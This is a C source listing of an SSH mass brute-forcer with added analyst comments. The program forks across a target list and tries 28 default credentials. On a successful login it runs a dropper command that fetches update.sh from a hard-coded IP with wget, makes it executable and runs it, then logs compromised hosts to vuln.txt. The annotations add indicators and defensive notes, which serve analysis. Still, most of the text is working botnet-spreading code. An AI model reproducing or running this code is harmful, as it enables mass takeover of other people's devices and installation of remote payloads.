KhaosBringer

Khaos Mass Bruteforcer.c

May 12th, 2019
C 7.22 KB | None | 0 0
  1. /*
  2. * cp /usr/local/lib/libssh.so /usr/lib/
  3. *
  4. * gcc -o update update.c -I /usr/local/include -L /usr/local/lib/ -lssh -lpthread
  5. *
  6. */
  7. #include <stdio.h>
  8. #include <arpa/inet.h>
  9. #include <libssh/libssh.h>
  10. #include <netinet/in.h>
  11. #include <string.h>
  12. #include <sys/socket.h>
  13. #include <sys/types.h>
  14. #include <netdb.h>
  15. #include <errno.h>
  16. #include <fcntl.h>
  17. #include <time.h>
  18.  
  19. #define NORM  "\033[00;00m"
  20.  
  21. #define ALBASTRU "\033[01;34m"
  22.  
  /*
   * test_pass() -- analyst annotation; the code below is unchanged.
   *
   * Makes one libssh password login as `user`/`password` against `host` and,
   * on the authenticated path, holds the dropper command string. No port
   * option is set, so libssh's default port applies.
   *
   * Return paths visible in this listing:
   *   -1         ssh_new() or ssh_connect() failed
   *   SSH_ERROR  ssh_channel_new() returned NULL (session is not released)
   *   1          ssh_channel_request_exec() did not return SSH_OK
   *   (none)     every other path reaches the closing brace without a
   *              return statement, so the caller reads an undefined value
   * A rejected password does not return at all: it calls exit(-1), which
   * ends the whole calling process.
   *
   * Forensic caveat: both callers in this file treat any nonzero result as a
   * hit, and -1 is nonzero, so "vuln.txt" lines written by this build are
   * not proof that a login succeeded.
   *
   * Indicators on this page: HTTP fetch of update.sh from 185.10.68.196 with
   * wget and busybox wget, working directory /tmp, chmod 777, execution with
   * sh, then removal of the script.
   *
   * Defensive notes: key-only SSH authentication and removal of
   * factory-default accounts take away the precondition; on a targeted host
   * the trace is password-auth attempts in the sshd log followed by an exec
   * request containing the wget line; egress filtering on embedded devices
   * blocks the fetch.
   */
  23. int test_pass(char *user, char *password, char *host) {
  24.     ssh_session my_ssh_session;
  25.     ssh_channel channel;
  26.     int rc;
  27.     // Open session and set options
  28.     my_ssh_session = ssh_new();
  29.     if (my_ssh_session == NULL)
  30.     return -1;
  31.     ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, host);
  32.     ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, user);
  33.     // Connect to server
  34.     rc = ssh_connect(my_ssh_session);
  35.     if (rc != SSH_OK) {
              // The error string is fetched and discarded; nothing is logged.
  36.         ssh_get_error(my_ssh_session);
  37.         ssh_free(my_ssh_session);
  38.         return -1;
  39.     }
  40.     // Authenticate ourselves
          // No host-key check is made between connect and authentication.
  41.     rc = ssh_userauth_password(my_ssh_session, NULL, password);
  42.     if (rc != SSH_AUTH_SUCCESS) {
  43.         ssh_get_error(my_ssh_session);
  44.         ssh_disconnect(my_ssh_session);
  45.         ssh_free(my_ssh_session);
              // Terminates the process rather than returning to the caller.
  46.         exit(-1);
  47.     } else {
  48.         channel = ssh_channel_new(my_ssh_session);
  49.         if (channel == NULL) return SSH_ERROR;
  50.         rc = ssh_channel_open_session(channel);
              // As written, the exec request sits in the branch taken when
              // ssh_channel_open_session() did NOT return SSH_OK.
  51.         if (rc != SSH_OK) {
                  // Dropper one-liner: the network and file indicators listed
                  // in the header comment all come from this string.
  52.             rc = ssh_channel_request_exec(channel, "cd /tmp; wget http://185.10.68.196/update.sh; busybox wget http://185.10.68.196/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh");
  53.             if (rc != SSH_OK) {
  54.                 return 1;
  55.             }
  56.         }
  57.     }
  58.     ssh_disconnect(my_ssh_session);
  59.     ssh_free(my_ssh_session);
          // No return statement follows; see the return-path table above.
  60. }
  61.  
  /*
   * checkauth() -- analyst annotation; the code below is unchanged.
   *
   * Probes TCP port 22 on `host` with a non-blocking connect and a one-second
   * select() timeout, then hands the credentials to test_pass(). When
   * test_pass() returns nonzero it reverse-resolves the address and appends
   * "user:password:name-or-address" to vuln.txt, echoing the same to stdout.
   *
   * Nothing in the visible listing calls this function; main() calls
   * test_pass() directly.
   *
   * Side effects a reader should know about:
   *   - the last character of `password` and of `host` is overwritten with
   *     NUL in the caller's buffers; an empty string would put the write
   *     before the start of the buffer
   *   - the so_error and timeout exits return without close(fd)
   *   - vuln.txt is opened in append mode on every hit, the fopen() result
   *     is not checked and the stream is never closed; `myaddr` is never
   *     freed
   *   - tstart/tend are sampled but never read
   *
   * Host artifact for hunting: a file named vuln.txt in the working
   * directory holding colon-separated user:password:host triples.
   */
  62. void checkauth(char *user, char *password, char *host) {
  63.     struct sockaddr_in addr_s; struct hostent *hp; struct in_addr  *myaddr;
  64.     FILE *vulnf;
  65.     short int fd=-1;
  66.     fd_set fdset;
  67.     struct timeval tv;
  68.     int rc;
  69.     int so_error;
  70.     socklen_t len;
  71.     struct timespec tstart={0,0}, tend={0,0};
  72.     int seconds = 1;
          // Drop the final character of each string in place (presumably a
          // trailing newline from line-based input -- not verifiable here).
  73.     password[strlen(password)-1] = 0;
  74.     host[strlen(host)-1] = 0;
  75.     addr_s.sin_family = AF_INET; // IPv4 only
  76.     addr_s.sin_addr.s_addr = inet_addr(host);
  77.     addr_s.sin_port = htons(22);
  78.  
  79.     clock_gettime(CLOCK_MONOTONIC, &tstart);
  80.  
          // The socket() result is stored in a short int and not checked.
  81.     fd = socket(AF_INET, SOCK_STREAM, 0);
  82.     fcntl(fd, F_SETFL, O_NONBLOCK); // setup non blocking socket
  83.  
  84.     // make the connection
  85.     rc = connect(fd, (struct sockaddr *)&addr_s, sizeof(addr_s));
  86.     if ((rc == -1) && (errno != EINPROGRESS)) {
  87.         close(fd);
  88.         return;
  89.     }
  90.  
  91.     FD_ZERO(&fdset);
  92.     FD_SET(fd, &fdset);
  93.     tv.tv_sec = seconds;
  94.     tv.tv_usec = 0;
  95.  
          // fdset is passed as the write set: waits up to `seconds` for the
          // connect attempt to finish.
  96.     rc = select(fd + 1, NULL, &fdset, NULL, &tv);
  97.     switch(rc) {
  98.     case 1: // fd reported writable: the connect attempt has completed
  99.         len = sizeof(so_error);
  100.  
  101.         getsockopt(fd, SOL_SOCKET, SO_ERROR, &so_error, &len);
  102.  
  103.         if (so_error == 0) {
  104.             clock_gettime(CLOCK_MONOTONIC, &tend);
  105.         } else { // error
                   // Returns with fd still open.
  106.             return;
  107.         }
  108.         break;
  109.     case 0: //timeout
               // Returns with fd still open.
  110.         return;
           // A select() result of -1 matches no case and falls through to
           // close(fd) and test_pass() below.
  111.     }
  112.     close(fd);
           // Any nonzero return counts as a hit, including test_pass()'s -1
           // connect-failure value.
  113.     if(test_pass(user, password, host)) {
  114.         myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
  115.         myaddr->s_addr=inet_addr(host);
  116.         hp = gethostbyaddr((char *) myaddr,4,AF_INET);
  117.         if((hp!=NULL)){
  118.             vulnf=fopen("vuln.txt","a+");
  119.             fprintf(vulnf,"%s:%s:%s\n",user,password,hp->h_name);
  120.             printf("\nKhaos Got Another root -> %s:%s:%s -> %s\n",user,password,host,hp->h_name);
  121.         } else {
  122.             vulnf=fopen("vuln.txt","a+");
  123.             fprintf(vulnf,"%s:%s:%s\n",user,password,host);
  124.             printf("\nKhaos Got Another root -> %s:%s:%s -> Can't Resolve DNS\n",user,password,host);
  125.         }
  126.     }
  127. }
  /*
   * main() -- analyst annotation; the code below is unchanged.
   *
   * Reads target lines from "mfu.txt", forks one child per line, and has each
   * child walk a hard-coded table of default/weak SSH credentials through
   * test_pass(). Hits are appended to "vuln.txt" and printed with the banner
   * "Khaos Got Another root". argv[1] is converted with atoi() and used as
   * the fork cap; argc is not checked.
   *
   * What the table tells a defender: the 28 pairs are factory or lab
   * defaults (root/root, admin/admin, ubnt/ubnt, vagrant/vagrant,
   * cisco/cisco, root/alpine and similar). A device that still accepts any
   * of them over SSH is exposed to this whole class of tool, so these pairs
   * make a useful audit list for an internal credential review.
   *
   * Points that matter when interpreting artifacts from this build:
   *   - the call passes combos[i][0] in both the user and the password
   *     position, while the log line records combos[i][1]; the password
   *     column in vuln.txt is therefore not the value that was submitted
   *   - any nonzero test_pass() result is logged as a hit
   *   - the child loop covers indices 0..26 of the 28-entry table
   *   - numforks is read before it is ever assigned
   *
   * Hunting notes for a host that ran it: mfu.txt and vuln.txt in the working
   * directory, a binary built as "update" per the build comment at the top
   * of the paste, and bursts of short-lived child processes opening
   * outbound SSH connections.
   */
  128. int main(int argc, char **argv)
  129. {
  130.     FILE *fp, *vulnf;
  131.     char *c;
  132.     char buff[4096];
  133.     int i;
  134.     int numforks,maxf;
           // Credential table: [i][0] is the user name, [i][1] the password.
  135.     char *combos[28][2];
  136.     combos[0][0] = "root";
  137.     combos[0][1] = "root";
  138.     combos[1][0] = "root";
  139.     combos[1][1] = "admin";
  140.     combos[2][0] = "root";
  141.     combos[2][1] = "password";
  142.     combos[3][0] = "root";
  143.     combos[3][1] = "default";
  144.     combos[4][0] = "root";
  145.     combos[4][1] = "toor";
  146.     combos[5][0] = "admin";
  147.     combos[5][1] = "admin";
  148.     combos[6][0] = "admin";
  149.     combos[6][1] = "1234";
  150.     combos[7][0] = "admin";
  151.     combos[7][1] = "12345";
  152.     combos[8][0] = "admin";
  153.     combos[8][1] = "password";
  154.     combos[9][0] = "ubnt";
  155.     combos[9][1] = "ubnt";
  156.     combos[10][0] = "vagrant";
  157.     combos[10][1] = "vagrant";
  158.     combos[11][0] = "test";
  159.     combos[11][1] = "test";
  160.     combos[12][0] = "root";
  161.     combos[12][1] = "ubnt";
  162.     combos[13][0] = "telnet";
  163.     combos[13][1] = "telnet";
  164.     combos[14][0] = "guest";
  165.     combos[14][1] = "guest";
  166.     combos[15][0] = "root";
  167.     combos[15][1] = "vagrant";
  168.     combos[16][0] = "default";
  169.     combos[16][1] = "";
  170.     combos[17][0] = "cisco";
  171.     combos[17][1] = "cisco";
  172.     combos[18][0] = "root";
  173.     combos[18][1] = "5up";
  174.     combos[19][0] = "user";
  175.     combos[19][1] = "password";
  176.     combos[20][0] = "user";
  177.     combos[20][1] = "user";
  178.     combos[21][0] = "root";
  179.     combos[21][1] = "debian";
  180.     combos[22][0] = "root";
  181.     combos[22][1] = "alpine";
  182.     combos[23][0] = "root";
  183.     combos[23][1] = "ceadmin";
  184.     combos[24][0] = "root";
  185.     combos[24][1] = "indigo";
  186.     combos[25][0] = "root";
  187.     combos[25][1] = "linux";
  188.     combos[26][0] = "root";
  189.     combos[26][1] = "rootpasswd";
  190.     combos[27][0] = "root";
  191.     combos[27][1] = "timeserver";
  192.     struct hostent *hp; struct in_addr  *myaddr;
           // Target list: one entry per line of mfu.txt in the working directory.
  193.     if((fp=fopen("mfu.txt","r"))==NULL) exit(printf("\e[1;31mFATAL: I Can't Open mfu.txt\n"NORM));
  194.     printf("\e[1;31mKhaos SSH Bruter \e[00;00m- \e[1;32m\n"NORM);
           // Fork cap from the first argument; a missing argument is not handled.
  195.     maxf=atoi(argv[1]);
  196.  
  197.     while(fgets(buff,sizeof(buff),fp))
  198.     {
               // Replaces the first letter 'n' found in the line, if any, with '.'.
  199.         c=strchr(buff,'n');
  200.         if(c!=NULL) *c='.';
               // Child process: handles this one target line, then exits.
  201.         if (!(fork())) {
                   // Disabled progress print ("Atacare" is Romanian for "attacking").
  202.             //   printf("--> Atacare %s",buff);
  203.             for(i = 0; i < 27; i++) {
                       // Runs on every iteration, so buff loses one more
                       // trailing character per pass.
  204.                 buff[strlen(buff)-1] = 0;
                       // The user name is passed in both credential positions here;
                       // the log lines below print combos[i][1] instead.
  205.                 if(test_pass(combos[i][0], combos[i][0], buff)) {
  206.                     myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
  207.                     myaddr->s_addr=inet_addr(buff);
  208.                     hp = gethostbyaddr((char *) myaddr,4,AF_INET);
  209.                     if((hp!=NULL)){
                               // Result log: appended to vuln.txt, stream never closed.
  210.                         vulnf=fopen("vuln.txt","a+");
  211.                         fprintf(vulnf,"%s:%s:%s\n", combos[i][0], combos[i][1], hp->h_name);
  212.                         printf("Khaos Got Another root -> %s:%s:%s -> %s\n", combos[i][0], combos[i][1], buff, hp->h_name);
  213.                     } else {
  214.                         vulnf=fopen("vuln.txt","a+");
  215.                         fprintf(vulnf,"%s:%s:%s\n", combos[i][0], combos[i][1], buff);
  216.                         printf("Khaos Got Another root -> %s:%s:%s -> Can't Resolve DNS\n", combos[i][0], combos[i][1], buff);
  217.                     }
  218.                     break;
  219.                 }
  220.             }
  221.             exit(0);
  222.         } else {
                   // Parent: numforks has no initial value before this increment.
  223.             numforks++;
  224.             if (numforks > maxf) for (numforks; numforks > maxf; numforks--) wait(NULL);
  225.         }
  226.     }
  227. }